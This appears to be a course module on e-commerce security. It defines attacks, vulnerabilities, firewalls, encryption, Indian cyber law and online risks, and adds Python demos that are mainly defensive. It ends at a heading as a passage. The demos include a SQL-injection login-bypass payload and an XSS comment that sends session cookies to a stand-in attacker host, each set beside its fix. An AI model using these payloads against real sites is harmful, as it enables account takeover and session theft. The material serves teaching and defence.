e com module 4


MODULE 4

E-SECURITY

Information system security


Security refers to the policies, procedures and technical measures used to prevent unauthorised access, alteration, theft or physical damage to information systems.

The main objectives of information security are:

● Availability objective: Information should be available and usable whenever it is required.
● Confidentiality objective: Information should be available only to those who have the right to access it.
● Integrity objective: Information should be protected from unauthorised alteration and modification.

Security on the internet

● Web security is the part of cybersecurity concerned with protecting websites and web applications by detecting, preventing and responding to cyber threats.
● It is a system of protection measures and protocols that can protect a website or web application from being hacked or entered by unauthorised personnel.
Network and web security risks

Hacking: Hacking is unauthorised intrusion into a computer or a network.
● The person engaged in hacking activities is generally referred to as a hacker.
● A hacker is a person who gains unauthorised access to a computer or network for profit, criminal mischief or personal pleasure.
● Types of hackers:
  ■ White hat hackers (test systems with the owner's permission)
  ■ Black hat hackers (break in without permission, usually for gain)
  ■ Grey hat hackers (break in without permission but without malicious intent, for example to report the weakness)

Denial of service attack (DoS): A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network, making it inaccessible to its intended users.
● DoS attacks accomplish this by flooding the target with traffic, or by sending it information that triggers a crash.
● When the flood comes from many compromised machines at once it is called a distributed denial-of-service (DDoS) attack, which cannot be stopped by blocking a single source address.

Viruses: A computer virus is a type of computer program that, when executed, replicates itself by modifying other computer programs and inserting its own code.
● If this replication succeeds, the affected programs are then said to be "infected" with a computer virus.

Trojan horses: In computing, a Trojan horse is any malware that misleads users about its true intent.
● The term is derived from the Ancient Greek story of the deceptive Trojan Horse
that led to the fall of the city of Troy.
● Trojans can be employed by cyber-thieves and hackers trying to gain access to
users' systems.
● Users are typically tricked by some form of social engineering into loading and
executing Trojans on their systems.

Internet hoax: Internet hoaxes are stories that spread throughout the internet, often through email, forums and blogs, or images that are untrue or altered versions of the truth.
● It is usually an email urging the recipient to pass the information on to as many people as possible.
● Many hoaxes only waste time and bandwidth, but some carry a malicious link or attachment, so a forwarded "warning" deserves the same suspicion as any other unsolicited message.

Worms: A computer worm is a standalone malware program that replicates itself in order to spread to other computers.
● It often uses a computer network to spread itself, relying on security failures on the target computer to access it.
● It then uses the infected machine as a host to scan for and infect other computers.
● Unlike a virus, a worm needs no host program: it copies itself recursively and spreads at an exponential rate, controlling and infecting more and more computers in a short time.

Spyware: Spyware is unwanted software that infiltrates a computing device and steals internet usage data and sensitive information.
● Spyware is classified as a type of malware, that is, malicious software designed to gain access to or damage a computer, often without the owner's knowledge. Spyware aims to gather information about a person or organisation and send it to another entity in a way that harms the user, for example by violating their privacy or endangering their device's security.

Adware: Adware, often called advertising-supported software by its developers, is software that generates revenue for its developer by automatically generating online advertisements in the user interface of the software or on a screen presented to the user during the installation process.
● The software may generate two types of revenue: one for the display of the advertisement and another on a "pay-per-click" basis, if the user clicks on the advertisement.

Phishing: Phishing is the fraudulent attempt to obtain sensitive information or data, such as usernames, passwords and credit card details, by impersonating a trustworthy entity in a digital communication.
● Phishing is a cybercrime in which a target or targets are contacted by email, telephone or text message by someone posing as a legitimate institution to lure individuals into providing sensitive data such as personally identifiable information, banking and credit card details, and passwords.

Vulnerability
A weakness in security procedures, network design, or implementation that
can be exploited to violate a corporate security policy is called vulnerability.
● Internet attacks can be launched from anywhere in the world and the location of the
attacker can easily be hidden.
● New web based attack types are coming out every day; this is causing businesses,
communities and individuals to take security seriously now.

Types of vulnerability:

SQL injection: It is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution.
● SQL injection is one of the most common web hacking techniques.
● It arises when user input is concatenated into the query text instead of being passed as a bound parameter; a successful injection can read, modify or destroy the contents of the database.
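The following is an added example, not code from the original module, showing the injectable form beside the parameterised one. The user table and its two accounts are constructed for the demo, and the passwords are kept in clear text only so the effect of the injection is visible (a real application stores salted hashes). The tautology payload `' OR '1'='1` makes the WHERE clause true for every row in the concatenated version and is harmless in the bound-parameter version.

```python
import sqlite3

# Constructed sample accounts for the demo (not from the original page).
# Passwords are stored in clear text only to keep the injection visible;
# a real system stores a salted hash.
USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """In-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string concatenation, so the input becomes SQL syntax."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with bound parameters: the driver sends the input as data,
    so quotes and keywords inside it never change the statement."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    """Runs a genuine login and a tautology payload against both versions."""
    conn = make_db()
    payload = "' OR '1'='1"   # WHERE ... AND password = '' OR '1'='1'  -> true for every row
    return {
        "vuln_good": login_vulnerable(conn, "alice", "s3cret"),
        "vuln_attack": login_vulnerable(conn, "nobody", payload),
        "safe_good": login_safe(conn, "alice", "s3cret"),
        "safe_attack": login_safe(conn, "nobody", payload),
    }
```

`demo()["vuln_attack"]` returns `"alice"`: the concatenated query logs the attacker in as the first user in the table without knowing any password. `demo()["safe_attack"]` returns `None` because the payload is compared literally against the password column.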

Cross site scripting (XSS): It is a client-side code injection attack.
● The attacker aims to execute malicious scripts in the victim's web browser by including malicious code in a legitimate web page or web application, typically by supplying input that the application echoes into its HTML without encoding it.
● The actual attack occurs when the victim visits the web page or web application that executes the malicious code.

Broken authentication and session management:
● If the user authentication system of a website is weak, hackers can take full advantage of it.
● Authentication systems involve passwords, session IDs and cookies; a session ID or cookie that is guessable, exposed or never expired can allow a hacker to access a user's account from any computer.
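For the cross-site scripting passage above, the following added example (not from the original module) renders a constructed list of customer comments, one of which is a cookie-stealing script, first by raw interpolation and then with output encoding. `html.escape` from the standard library encodes the five HTML metacharacters; with `quote=True` it also neutralises quotes, which matters when the value lands inside an attribute.

```python
from html import escape

# Constructed comment list (not from the original page); the second entry is
# a typical stored-XSS payload that exfiltrates the session cookie.
COMMENTS = [
    "Great shop, fast delivery!",
    '<script>document.location="http://evil.example/?c="+document.cookie</script>',
]


def render_unsafe(comments):
    """Interpolates user text straight into the HTML: the payload becomes live markup."""
    return "".join(f"<li>{c}</li>" for c in comments)


def render_safe(comments):
    """Encodes < > & " ' so the browser displays the payload as text."""
    return "".join(f"<li>{escape(c, quote=True)}</li>" for c in comments)


def attribute_safe(value):
    """Attribute context: quote=True stops the value closing the value="..."
    attribute and smuggling in an event handler such as onmouseover=."""
    return f'<input name="q" value="{escape(value, quote=True)}">'


def contains_live_script(html):
    """Crude check used by the demo: does a real <script> tag survive in the output?"""
    return "<script>" in html.lower()
```

`render_unsafe(COMMENTS)` keeps the `<script>` tag intact, so every visitor who views the comments runs it; `render_safe(COMMENTS)` turns it into `&lt;script&gt;...`, which the browser shows but never executes. The escaping has to be applied for the context the data lands in (element text, attribute value, URL, JavaScript string); the attribute helper shows the second of these.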

Cross site request forgery attack:
● Cross-site request forgery (also known as CSRF, one-click attack or session riding) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform.
● In a successful CSRF attack, the attacker causes the victim user to carry out an action unintentionally. For example, this might be to change the email address on their account, to change their password, or to make a funds transfer. Depending on the nature of the action, the attacker might be able to gain full control over the user's account.
● It is a malicious exploit of a website in which unauthorised commands are submitted from a user that the web application trusts: the browser attaches the victim's session cookie automatically, so the server cannot tell a forged request from a genuine one unless the request carries something the attacker's page cannot obtain, such as a per-session anti-CSRF token.
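The exchange described above, as an added example that is not part of the original module: a funds-transfer handler protected by a synchroniser token. The handler, the request dictionaries standing in for HTTP requests, the session store and the server key are all constructed for the demo. The token is an HMAC of the session ID under a server-side key, so a page on `evil.example` can make the victim's browser send the cookie but cannot put a valid token in its form.

```python
import hashlib
import hmac
import secrets

# Server-side key generated at startup (constructed for the example).
SERVER_KEY = secrets.token_bytes(32)


def csrf_token(session_id: str) -> str:
    """Synchroniser token bound to the session: HMAC(key, session_id).
    It is embedded in the site's own forms; a cross-site page never sees it."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer(request: dict, session_store: dict) -> str:
    """Processes POST /transfer. `request` stands in for the HTTP request:
    cookies are attached by the browser automatically, form fields come
    from whichever page built the form."""
    session_id = request["cookies"].get("session")
    if session_id not in session_store:
        return "401 not logged in"
    token = request["form"].get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(token, csrf_token(session_id)):
        return "403 CSRF check failed"
    session_store[session_id]["balance"] -= int(request["form"]["amount"])
    return "200 transferred"


def demo():
    sessions = {"sess-abc": {"user": "alice", "balance": 100}}
    # Genuine request from the bank's own page: the form carries the token.
    genuine = {"cookies": {"session": "sess-abc"},
               "form": {"amount": "10", "csrf_token": csrf_token("sess-abc")}}
    # Forged request triggered from evil.example: the browser still sends the
    # session cookie, but the attacker's form cannot contain a valid token.
    forged = {"cookies": {"session": "sess-abc"},
              "form": {"amount": "90", "to": "attacker"}}
    return (handle_transfer(genuine, sessions),
            handle_transfer(forged, sessions),
            sessions["sess-abc"]["balance"])
```

`demo()` returns `("200 transferred", "403 CSRF check failed", 90)`: only the genuine request moves money. A second, independent layer is to set the session cookie with the `SameSite=Lax` or `SameSite=Strict` attribute, so the browser withholds it from cross-site POSTs in the first place.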

Clickjacking attack: Clickjacking is an attack that tricks a user into clicking a webpage element which is invisible or disguised as another element, typically by loading the target site in a transparent frame on top of an attacker-controlled page.
● This can cause users to unwittingly download malware, visit malicious web pages, provide credentials or sensitive information, transfer money, or purchase products online.
● The usual defence is for the site to tell the browser not to render it inside another site's frame, using the X-Frame-Options header or the frame-ancestors directive of Content-Security-Policy.
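As an added example (not from the original module), the following classifies a response's anti-framing policy from its headers and adds the missing headers when there is none. The header dictionaries are constructed; the precedence rule it applies, that a `frame-ancestors` directive wins over `X-Frame-Options` when both are present, is the one browsers use.

```python
def frame_protection(headers: dict) -> str:
    """Classifies the framing policy of an HTTP response from its headers.
    Returns 'denied', 'same-origin', 'allow-list' or 'unprotected'."""
    lower = {k.lower(): v for k, v in headers.items()}
    # Content-Security-Policy frame-ancestors takes precedence when present.
    csp = lower.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [s.strip("'").lower() for s in parts[1:]]
            if sources == ["none"]:
                return "denied"
            if sources == ["self"]:
                return "same-origin"
            return "allow-list"
    # Otherwise fall back to the older X-Frame-Options header.
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return "denied"
    if xfo == "SAMEORIGIN":
        return "same-origin"
    return "unprotected"


def hardened_headers(headers: dict) -> dict:
    """Returns a copy of the headers with both anti-framing headers added
    when the response had neither (existing policies are left untouched)."""
    if frame_protection(headers) != "unprotected":
        return dict(headers)
    out = dict(headers)
    out["X-Frame-Options"] = "DENY"
    csp = out.get("Content-Security-Policy", "").rstrip("; ")
    out["Content-Security-Policy"] = (csp + "; " if csp else "") + "frame-ancestors 'none'"
    return out
```

A page that must be embeddable by a known partner uses `frame-ancestors 'self' https://partner.example` (classified as `allow-list`); `X-Frame-Options` has no equivalent, which is why the CSP directive is the one to set on new sites.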

Social engineering attack:
● It happens when a user reveals private information in good faith, such as a credit card number, through common online interactions such as email, chat or social media, because the attacker has persuaded them that the request is legitimate.

Website defacement: Website defacement is an attack on a website that changes the visual appearance of the website or a web page. These are typically the work of defacers, who break into a web server and replace the hosted website with one of their own.
● Visitors may also be redirected to a website with an address quite similar to the company's.

Cyber industrial espionage: Cyber espionage is a form of cyber attack that steals
classified, sensitive data or intellectual property to gain an advantage over a
competitive company or government entity. Espionage is “the practice of spying or
using spies to obtain information about the plans and activities especially of a foreign
government or a competing company.”

Credit card fraud and theft of customer data: Credit card fraud is an inclusive term for fraud committed using a payment card, such as a credit card or debit card.
● The purpose may be to obtain goods or services, or to make a payment to another account which is controlled by a criminal.
● The type of fraud causing most concern among online merchants is identity theft: a criminal uses a stolen card number, or an account opened in someone else's name, for card-not-present purchases, and the merchant bears the chargeback.

Network and web security

The goal of security management is to minimise risk and ensure protection by limiting the impact of a security breach.

Monitor network performance: Network performance monitoring is a routine process to evaluate, analyse, report on and track the performance of a computer network.

Username and password: Password protection allows only those who hold an authorised password to gain access to certain information.

Use of firewall: It is a network security system designed to prevent unauthorised access to or from a private network. It is a network security device that monitors incoming and outgoing network traffic and decides whether to allow or block specific traffic based on a defined set of security rules. Firewalls can be implemented as hardware, as software, or as a combination of both.

Intrusion detection: It is a system that monitors network traffic for suspicious activity and issues alerts when such activity is discovered. While anomaly detection and reporting is the primary function, some intrusion detection systems are capable of taking action when malicious activity or anomalous traffic is detected.
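The following is an added example of the detection logic described above, not code from the original module. It runs two rules over a constructed set of syslog-style lines: an anomaly rule that raises an alert when one source address produces five or more failed logins inside a sixty-second window, and a signature rule that matches a known SQL-injection tautology in a decoded web request. The log format, the threshold and the signature are all assumptions made for the demo.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample log lines (not from the original page).
LOG_LINES = """\
2024-05-01T10:00:01 sshd[101]: Failed password for admin from 203.0.113.7 port 5001
2024-05-01T10:00:02 sshd[101]: Failed password for admin from 203.0.113.7 port 5002
2024-05-01T10:00:03 sshd[101]: Failed password for root from 203.0.113.7 port 5003
2024-05-01T10:00:04 sshd[101]: Failed password for admin from 203.0.113.7 port 5004
2024-05-01T10:00:05 sshd[101]: Failed password for admin from 203.0.113.7 port 5005
2024-05-01T10:00:09 sshd[101]: Accepted password for alice from 198.51.100.4 port 6000
2024-05-01T10:02:00 httpd[77]: GET /search?q=%27%20OR%20%271%27%3D%271 from 203.0.113.9
2024-05-01T10:03:00 sshd[101]: Failed password for bob from 198.51.100.4 port 6001
""".splitlines()

# timestamp, process, message, source IP (assumed line layout)
LINE_RE = re.compile(r"^(\S+) (\w+)\[\d+\]: (.*) from (\d+\.\d+\.\d+\.\d+)")

# Signature rules are matched against the URL-decoded message text.
SIGNATURES = {
    "sqli-tautology": re.compile(r"'\s*or\s*'1'\s*=\s*'1", re.I),
}


def detect(lines, threshold=5, window=timedelta(seconds=60)):
    """Returns a list of alert strings for the given log lines."""
    alerts = []
    failures = defaultdict(deque)   # source IP -> timestamps of recent failures
    already_alerted = set()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        stamp, _proc, msg, ip = m.groups()
        ts = datetime.fromisoformat(stamp)
        # Anomaly rule: too many failed logins from one address in the window.
        if msg.startswith("Failed password"):
            q = failures[ip]
            q.append(ts)
            while q and ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold and ip not in already_alerted:
                already_alerted.add(ip)
                alerts.append(f"brute-force: {len(q)} failed logins from {ip} "
                              f"within {window.seconds}s")
        # Signature rule: known attack pattern in the decoded request.
        for name, pattern in SIGNATURES.items():
            if pattern.search(unquote(msg)):
                alerts.append(f"signature {name}: {msg} from {ip}")
    return alerts
```

On the constructed lines `detect(LOG_LINES)` returns two alerts: the brute-force alert fires on the fifth failure from 203.0.113.7, and the signature rule flags the encoded `' OR '1'='1` request. The single failure from 198.51.100.4 stays below the threshold, which is the trade-off every anomaly rule makes between noise and missed slow attacks.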

Virus scanning software: It helps to scan and identify any malicious content and
removes it from the system.
Transaction security and data protection

Encryption: It is the process of transforming plain text or data into cipher text that cannot be read by anyone who does not hold the decryption key; the intended receiver uses the key to recover the plain text.

Secure socket layer (SSL): The SSL protocol provides data encryption, server authentication, optional client authentication and message integrity for TCP/IP connections. The SSL versions themselves are now deprecated; their successor, TLS (Transport Layer Security), is what HTTPS connections actually use today, although the name "SSL" is still common.

Secure hypertext transfer protocol (S-HTTP): It is a secure message-oriented communications protocol designed for use in conjunction with HTTP. Generally, S-HTTP attempts to make HTTP more secure by protecting individual messages; it was never widely adopted, and HTTPS (HTTP carried over SSL/TLS) became the standard instead.

Trusted seals programs: A number of trustmark seals have been developed to provide assurance about web business practices and policies through the web interface.

Digital signature: A digital signature is a technique used to validate the authenticity and integrity of a message, software or digital document. It is the digital equivalent of a handwritten signature or stamped seal, but it offers far more inherent security: it is computed with the signer's private key and checked with the matching public key, so any change to the signed data makes the check fail.

Secure electronic transaction (SET): SET was designed to provide payment security for all parties involved, authenticate card holders and merchants, provide confidentiality for payment data and define the protocols for card payments. It was never widely adopted; card payments on the web rely on TLS and the card networks' own verification schemes instead.

Digital certificate: It is a digital document issued by a trusted third-party institution known as a certificate authority that contains the name of the subject or company, the subject's public key, a certificate serial number, an expiration date, the digital signature of the certification authority and other identifying information. The certificate is signed with the private key of the certification authority.
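The following added example (not from the original module) carries the digital signature and digital certificate passages above through in code: a certificate authority signs a merchant's certificate, and the merchant signs an order that a customer verifies against the key in that certificate. It uses textbook RSA with Mersenne primes and no padding so the arithmetic is transparent; that choice is an illustration only, a real deployment uses 2048-bit random primes with RSA-PSS or an elliptic-curve scheme from a vetted library. The merchant name, serial number, dates and order text are constructed.

```python
import hashlib
import json

# Textbook RSA on known Mersenne primes: fine for showing the mechanism,
# nowhere near secure. Requires Python 3.8+ for pow(e, -1, phi).
E = 65537


def keygen(p, q, e=E):
    """Returns (public_key, private_key) for primes p, q."""
    n = p * q
    d = pow(e, -1, (p - 1) * (q - 1))
    return {"n": n, "e": e}, {"n": n, "d": d}


def digest(message: bytes, n: int) -> int:
    """SHA-256 of the message, reduced mod n so it fits the toy modulus."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(priv, message: bytes) -> int:
    return pow(digest(message, priv["n"]), priv["d"], priv["n"])


def verify(pub, message: bytes, signature: int) -> bool:
    return pow(signature, pub["e"], pub["n"]) == digest(message, pub["n"])


def issue_certificate(ca_priv, subject, subject_pub, serial, expires):
    """The CA binds a name to a public key by signing the certificate fields."""
    body = {"subject": subject, "public_key": subject_pub,
            "serial": serial, "expires": expires}
    encoded = json.dumps(body, sort_keys=True).encode()
    return {**body, "ca_signature": sign(ca_priv, encoded)}


def check_certificate(ca_pub, cert, today):
    """Valid only if the CA signature matches every field and it has not expired."""
    body = {k: v for k, v in cert.items() if k != "ca_signature"}
    encoded = json.dumps(body, sort_keys=True).encode()
    return verify(ca_pub, encoded, cert["ca_signature"]) and today <= cert["expires"]


def demo():
    ca_pub, ca_priv = keygen(2**31 - 1, 2**61 - 1)
    merchant_pub, merchant_priv = keygen(2**89 - 1, 2**107 - 1)
    cert = issue_certificate(ca_priv, "shop.example", merchant_pub,
                             serial=1001, expires="2026-12-31")
    order = b"order 4711: 2 x widget, total 19.90 EUR"
    sig = sign(merchant_priv, order)
    forged = dict(cert, subject="evil.example")   # fields edited after signing
    return {
        "cert_valid": check_certificate(ca_pub, cert, today="2025-06-01"),
        "cert_expired": check_certificate(ca_pub, cert, today="2027-01-01"),
        "forged_cert": check_certificate(ca_pub, forged, today="2025-06-01"),
        "order_ok": verify(cert["public_key"], order, sig),
        "order_tampered": verify(cert["public_key"],
                                 b"order 4711: 2 x widget, total 1.90 EUR", sig),
    }
```

`demo()` shows the two checks a browser or payment client performs in turn: the CA's signature over the certificate proves the public key belongs to `shop.example`, and the merchant's signature over the order proves the order text is what the merchant signed. Editing either the certificate fields or the order breaks the corresponding check.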
The firewall

In computing, a firewall is a network security system that monitors and filters incoming and outgoing network traffic based on an organisation's previously established security policies. A firewall typically establishes a barrier between a trusted network and an untrusted network, such as the Internet.
● The aim of this wall is to protect the premises network from internet-based attacks and to provide a single choke point where security and auditing can be checked.

Protection from vulnerabilities: An internet connection is exposed to hackers who want to access financial and personal information; the firewall narrows what they can reach to the services the policy explicitly exposes.

Managing and controlling network traffic: This is the first and most basic function. The firewall should be able to identify which data packets are coming through and which connections are established, and be able to control that traffic.

Authentication access: The use of packet filtering helps to restrict resource access from unexpected sources.

Acting as an intermediary: Instead of allowing computers to connect directly to the internet, a firewall is configured as an intermediary device between the premises network and the internet. The simplest mechanism for verification is asking users for a username and password whenever they want to access the system.

Resource protection: An important task of a firewall is to protect the network's resources from outside threats.

Recording and reporting of events: It records all information about activities that violate policy and reports them to the administrator.

Preventing access to information: It is also used to limit the activities of the organisation's own users on the internet.

Enforcing policy: Firewalls enforce the rules about which network traffic is allowed to enter or leave a network.

Auditing: If a security breach occurs, audit trails can be used to help determine
what had happened.
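The following is an added example (not from the original module) of the packet-filtering, default-deny and recording functions described in the "Use of firewall" and "The firewall" passages above. The rule table, the protected address range (203.0.113.0/24) and the sample packets are constructed; first matching rule wins, anything unmatched is denied, and every denial is appended to a log so the administrator has the audit trail the section describes.

```python
from ipaddress import ip_address, ip_network

# Constructed policy: public HTTPS to the web server, SSH only from the
# internal 10/8 network, everything else to the DMZ range denied.
RULES = [
    {"action": "allow", "proto": "tcp", "src": "0.0.0.0/0",  "dst": "203.0.113.10/32", "dport": 443},
    {"action": "allow", "proto": "tcp", "src": "10.0.0.0/8", "dst": "203.0.113.10/32", "dport": 22},
    {"action": "deny",  "proto": "any", "src": "0.0.0.0/0",  "dst": "203.0.113.0/24",  "dport": None},
]


def matches(rule, pkt):
    """True when every field of the rule covers the packet's header fields."""
    return ((rule["proto"] == "any" or rule["proto"] == pkt["proto"])
            and ip_address(pkt["src"]) in ip_network(rule["src"])
            and ip_address(pkt["dst"]) in ip_network(rule["dst"])
            and (rule["dport"] is None or rule["dport"] == pkt["dport"]))


def filter_packet(pkt, rules=RULES, log=None):
    """Returns 'allow' or 'deny' for one packet; first matching rule wins and
    unmatched traffic is denied. Denials are appended to `log` when given."""
    for rule in rules:
        if matches(rule, pkt):
            decision = rule["action"]
            break
    else:
        decision = "deny"   # default deny: nothing passes unless a rule allows it
    if decision == "deny" and log is not None:
        log.append(f"DENY {pkt['proto']} {pkt['src']} -> {pkt['dst']}:{pkt['dport']}")
    return decision


def demo():
    """Runs four constructed packets through the policy."""
    log = []
    packets = [
        {"proto": "tcp", "src": "198.51.100.5", "dst": "203.0.113.10", "dport": 443},  # public HTTPS
        {"proto": "tcp", "src": "198.51.100.5", "dst": "203.0.113.10", "dport": 22},   # SSH from outside
        {"proto": "tcp", "src": "10.1.2.3",     "dst": "203.0.113.10", "dport": 22},   # SSH from inside
        {"proto": "udp", "src": "198.51.100.5", "dst": "203.0.113.11", "dport": 161},  # SNMP probe
    ]
    return [filter_packet(p, log=log) for p in packets], log
```

`demo()` returns `(["allow", "deny", "allow", "deny"], log)` with two logged denials. The filter is stateless, so it judges each packet on its own; a stateful firewall additionally tracks established connections so that reply traffic is admitted without a separate inbound rule.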
E-business risk management issues

E-business risk management involves identifying and addressing potential risks that businesses face when operating online. Here are key risk management issues in e-business:

1. Cybersecurity Risks

● Vulnerability to hacking, malware, phishing and data breaches.
● Management: Use firewalls, encryption, multi-factor authentication, regular security audits and employee training.

2. Privacy Risks

● Unauthorised access to or misuse of personal and sensitive customer data.
● Management: Implement data protection policies, comply with privacy laws (e.g., GDPR), and use secure data storage solutions.

3. Financial Risks

● Fraud, online payment security, or financial loss due to poor management of e-commerce transactions.
● Management: Employ secure payment gateways, monitor transactions for suspicious activity, and ensure proper financial controls.

4. Legal and Compliance Risks

● Risk of non-compliance with laws on intellectual property, consumer protection and data protection.
● Management: Stay informed about legal requirements and ensure adherence to them, especially when operating internationally.

5. Reputation Risks

● Negative online reviews, social media backlash, or failure to meet customer expectations can harm the company's reputation.
● Management: Monitor customer feedback, respond promptly to complaints, and maintain high customer service standards.

6. Supply Chain and Operational Risks

● Disruptions in the supply chain or logistical issues that impact the ability to deliver products or services.
● Management: Develop contingency plans, diversify suppliers, and use technology to track inventory and shipments.

7. Technology Risks

● System downtime, technical failures, or software bugs that affect e-business operations.
● Management: Invest in robust IT infrastructure, perform regular software updates, and have disaster recovery plans in place.

8. Intellectual Property Risks

● Theft of proprietary information, software, or content.
● Management: Secure intellectual property through patents, trademarks and copyrights, and implement strong digital rights management (DRM).

9. Market and Competitive Risks

● Rapid changes in market trends or competition that can affect profitability.
● Management: Regularly analyse market trends, adjust business strategies, and maintain a competitive edge.

10. Human Resource Risks

● Insider threats, lack of skilled staff, or high turnover rates that affect e-business operations.
● Management: Focus on employee training, implement strict internal controls, and build a strong organisational culture.
Information security environment in india
India's information security environment is evolving, with increasing emphasis on
protecting data and digital infrastructure due to the rapid expansion of the internet and
digital economy. Below are key elements that shape India's information security
landscape:

1. Cybersecurity Challenges

● Growing Cyber Threats: India faces increasing cyber threats, including hacking, ransomware, phishing attacks and cyber terrorism. As digital adoption grows, these threats have become more sophisticated.
● Data Privacy Concerns: With the rise of digital services, the risk of data breaches and misuse of personal data is a growing concern.

2. Government Initiatives

● National Cyber Security Policy (NCSP): The government introduced the NCSP in 2013 to safeguard the country's cyberspace and create a secure environment for e-governance and IT infrastructure.
● Cyber Security Infrastructure: Establishment of CERT-In (the Indian Computer Emergency Response Team) to respond to cyber incidents and provide guidelines for businesses and individuals to improve cybersecurity.
● Digital India: The "Digital India" programme aims to increase digital literacy and create secure online platforms, strengthening cybersecurity measures for e-governance and other services.

3. Legal Framework

● Information Technology Act, 2000 (IT Act): Provides a legal framework for electronic transactions, cybersecurity and digital signatures, with provisions for cybercrimes and data protection.
● Digital Personal Data Protection Act, 2023 (DPDP Act): The earlier Personal Data Protection Bill was withdrawn in 2022 and replaced by the DPDP Act, enacted in August 2023, which regulates the processing of digital personal data, gives individuals rights over their data and provides penalties for non-compliance.
● Other Regulations: India is also aligning its data protection rules with global standards such as the GDPR to improve data protection and privacy.

4. Private Sector Role

● Cybersecurity Practices: Many Indian companies, particularly in the IT and e-commerce sectors, are investing heavily in cybersecurity tools and training to protect against cyber threats.
● Public-Private Collaboration: Collaboration between government and the private sector is critical in advancing the country's cybersecurity readiness, for example by sharing threat intelligence and implementing best practices.

5. Critical Infrastructure Protection

● India has identified critical infrastructure sectors such as banking, power, telecommunications and healthcare as particularly vulnerable to cyber-attacks. Efforts to protect these sectors have been a priority, with the introduction of stricter guidelines and frameworks.

6. Capacity Building and Awareness

● Skill Development: There is a focus on building cybersecurity expertise through academic courses, training programmes and certifications. The National Institute of Electronics and Information Technology (NIELIT) and other institutions play a significant role.
● Cybersecurity Awareness: Public awareness campaigns are growing to educate individuals and organisations about best practices for cybersecurity.

7. International Cooperation

● Global Partnerships: India cooperates with international agencies such as INTERPOL and the United Nations, and with other countries, to combat cross-border cybercrime and enhance global cybersecurity standards.
Legal and ethical issues
Ethical issues deal with what is considered to be right and wrong.
● If anybody does something that is not legal, they are breaking the law, but if they
do something unethical, they may not be breaking the law.

Ethical Issues:

1.​ Web spoofing: It occurs when the attacker sets up a fake website which is
almost same as the original website in order to attract consumers to give their
credit card number or other personal information. Normally, the spoof website
will adopt the design of the target website, and it sometimes has a similar URL.

2. Cyber squatting: It is an activity in which a person or firm registers, purchases and uses an existing domain name belonging to a well-known organisation for the purpose of infringing its trademark. The cybersquatter then offers to sell the domain to the person or company who owns a trademark contained within the name, at an inflated price.

3.​ Web tracking: Web tracking is the practice by which operators of websites
collect, store and share information about visitors’ activities on the World Wide
Web.

4.​ Identity theft: Identity theft occurs when someone uses another person's
personal identifying information, like their name, identifying number, or credit
card number, without their permission, to commit fraud or other crimes.

Legal Issue:

1. Cyberstalking: It is a criminal practice in which an individual uses the internet to systematically harass or threaten someone. This crime can be committed through email, social media, chat rooms, instant messaging clients and any other online medium. A stalker may be an online stranger or a person whom the target knows.

2. Application fraud on the internet: Small investors are attracted by promises of false profits made by stock promoters. The availability of email and pop-up ads has paved the way for financial criminals to reach many people at once.

3.​ Skimming: Skimming is the unauthorized capture and transfer of payment data
to another source. For example, information that is electronically stored on the
magnetic stripe of a credit card or debit card is illegally copied during an
attempt to use an automatic teller machine (ATM).

4.​ Copyright: Copyright is a type of intellectual property that gives its owner the
exclusive right to make copies of a creative work, usually for a limited time.
Unfortunately, it is easy for the computer to create an exact copy of
valuable software in seconds. Software piracy is widespread. It refers to
the unauthorized duplication of computer software.

Internet Gambling
It refers to the act of placing bets or playing games of chance for money through
online platforms. It includes activities such as online casinos, sports betting, poker,
bingo, and esports betting. The industry has grown significantly, driven by the rise of
internet accessibility and digital payment methods.

Types of Internet Gambling:

● Online Casinos: Games like slots, blackjack and roulette.
● Sports Betting: Betting on the outcomes of various sports events.
● Online Poker: Players compete in poker games for real money.
● Esports Betting: Betting on competitive video game tournaments.
● Bingo and Lottery: Online versions of these traditional gambling games.

Legal and Regulatory Issues: The legality of internet gambling varies by country and
region. Some countries, like the UK, have robust regulations, while others, like India,
have unclear or restrictive laws. Regulations typically aim to ensure fair play,
protect consumers, and prevent fraud and money laundering.

Risks:

● Addiction: Easy access to gambling can lead to problematic gambling behaviour.
● Fraud and Scams: Not all gambling sites are legitimate, posing risks to players.
● Privacy and Security: Personal and financial information may be exposed if platforms lack proper security.

Online threats to children

Children are increasingly exposed to a variety of online threats due to the widespread
use of digital devices and the internet. These threats can negatively affect their safety,
development, and well-being. Below is an overview of common online threats to
children:

1. Cyberbullying

●​ Cyberbullying involves the use of digital platforms (social media, gaming sites,
text messages) to harass, threaten, or belittle a child.
●​ Impact: Emotional distress, depression, anxiety, and sometimes physical harm.
Victims may experience a sense of isolation and diminished self-esteem.
●​ Prevention: Encourage open communication, monitor online activity, and
educate children on how to block or report cyberbullying incidents.

2. Online Predators

●​ Online predators are individuals who use the internet to exploit children for
sexual purposes or grooming. They may attempt to build relationships with
children through social media, chat rooms, or gaming platforms.
●​ Impact: Sexual exploitation, emotional manipulation, and physical harm.
●​ Prevention: Monitor online interactions, set privacy settings on social media,
and educate children about not sharing personal information online with
strangers.

3. Exposure to Inappropriate Content

